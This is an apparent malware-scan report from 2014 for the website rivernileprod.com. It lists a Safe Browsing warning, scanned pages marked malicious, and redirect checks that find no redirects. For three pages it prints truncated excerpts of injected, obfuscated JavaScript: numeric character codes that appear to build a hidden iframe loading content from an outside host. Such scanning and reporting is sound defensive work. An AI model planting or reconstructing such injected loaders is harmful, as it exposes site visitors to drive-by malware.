Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rivernileprod.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rivernileprod.com/ | 200 OK Content-Length: 6568 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,200,172,166,162,162,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,200,172,166,162,162,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,154,151,70,67,74,65,176,154,151,151,166,177,73,73,73,65,172,154,171,175,154,171,64,157,166,164,15 Antivirus reports:
| ||
http://rivernileprod.com/includes/swfobject.js | 200 OK Content-Length: 12389 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,154,151,70,67,74,65,176,154,151,151,166,177,73,73,73,65,172,154,171,175,154,171,64,157,166,164,154,65,166,171,156,66,172,152,171, Antivirus reports:
| ||
http://rivernileprod.com/about.html | 200 OK Content-Length: 18487 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,200,172,166,162,162,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,200,172,166,162,162,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,154,151,70,67,74,65,176,154,151,151,166,177,73,73,73,65,172,154,171,175,154,171,64,157,166,164,15 Antivirus reports:
| ||
http://rivernileprod.com/test404page.js | 404 Not Found Content-Length: 398 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rivernileprod.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Mar 2014 20:45:16 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 6568
Content-Type: text/html
...6568 bytes of data.
GET / HTTP/1.1
Host: rivernileprod.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Mar 2014 20:45:16 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 6568
Content-Type: text/html
...6568 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rivernileprod.com
Referer: http://www.google.com/search?q=rivernileprod.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rivernileprod.com
Referer: http://www.google.com/search?q=rivernileprod.com
Result:
The result is similar to the first query. There are no suspicious redirects found.